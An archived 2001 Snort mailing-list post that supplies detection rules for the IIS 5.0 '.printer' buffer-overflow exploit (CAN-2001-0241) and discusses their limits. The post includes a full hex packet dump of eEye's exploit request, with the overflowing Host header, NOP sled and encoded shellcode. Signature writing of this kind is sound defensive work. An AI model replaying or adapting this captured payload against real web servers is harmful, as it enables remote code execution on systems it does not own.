Snort mailing list archives
IIS 5.0 printer exploit signature
From: Brian Caswell <bmc () mitre org>
Date: Wed, 02 May 2001 16:34:25 -0400
Snort 1.8 rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; uricontent:".printer"; nocase; flags:A+; reference:cve,CAN-2001-0241; classtype:attempted-admin;) Snort 1.7 rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; content:".printer"; nocase; flags:A+; reference:cve,CAN-2001-0241;) Snort 1.6.3 rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS printer attempt"; content:".printer"; nocase; flags:AP;) Below is a packet dump from the eEye exploit. Until we have session decodes, we can't check both Host: and the URI. (Adding as many HTTP headrs as you want can offset the Host: header into a different packet. We could use an activate/dynamic rule pair to be more accurate, but as a standard we havn't used those in the snort.org ruleset yet. This looks like the first time. Check back later for an activate/dynamic rule that is more specific. 05/02-16:23:12.028893 192.168.0.9:16777 -> 192.168.0.10:80 TCP TTL:64 TOS:0x0 ID:28940 IpLen:20 DgmLen:383 DF ***AP*** Seq: 0x51D013C1 Ack: 0x57194C33 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 6E 75 6C 6C 2E 70 72 69 6E 74 65 GET /null.printe 72 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 r HTTP/1.1..Host 3A 20 8B C4 83 C0 11 33 C9 66 B9 20 01 80 30 03 : .....3.f. ..0. 40 E2 FA EB 03 03 03 03 5C 88 E8 82 EF 8F 09 03 @.......\....... 03 44 80 3C FC 76 F9 80 C4 07 88 F6 30 CA 83 C2 .D.<.v......0... 07 88 04 8A 05 80 C5 07 80 C4 07 E1 F7 30 C3 8A .............0.. 3D 80 C5 07 80 C4 17 8A 3D 80 C5 07 30 C3 82 C4 =.......=...0... FC 03 03 03 53 6B 83 03 03 03 69 01 53 53 6B 03 ....Sk....i.SSk. 03 03 43 FC 76 13 FC 56 07 88 DB 30 C3 53 54 69 ..C.v..V...0.STi 48 FC 76 17 50 FC 56 0F 50 FC 56 03 53 FC 56 0B H.v.P.V.P.V.S.V. FC FC FC FC CB A5 EB 74 8E 28 EA 74 B8 B3 EB 74 .......t.(.t...t 27 49 EA 74 60 39 5F 74 74 74 2D 66 46 7A 66 2D 'I.t`9_ttt-fFzf- 60 6C 6E 2D 77 7B 77 03 6A 6A 70 6B 62 60 68 31 `ln-w{w.jjpkb`h1 68 23 2E 23 66 46 7A 66 23 47 6A 64 77 6A 62 6F h#.#fFzf#Gjdwjbo 23 50 66 60 76 71 6A 77 7A 0E 09 23 45 6C 71 23 #Pf`vqjwz..#Elq# 67 66 77 62 6A 6F 70 23 75 6A 70 6A 77 39 23 4B gfwbjop#ujpjw9#K 77 77 73 39 2C 2C 74 74 74 2D 66 46 7A 66 2D 60 wws9,,ttt-fFzf-` 6C 6E 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ln.............. 03 03 03 03 03 03 90 90 90 90 90 90 90 90 CB 4A ...............J 42 6C 90 90 90 90 66 81 EC 14 01 FF E4 03 03 03 Bl....f......... 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ................ 03 03 03 0D 0A 0D 0A ....... -- Brian Caswell The MITRE Corporation _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- IIS 5.0 printer exploit signature Brian Caswell (May 02)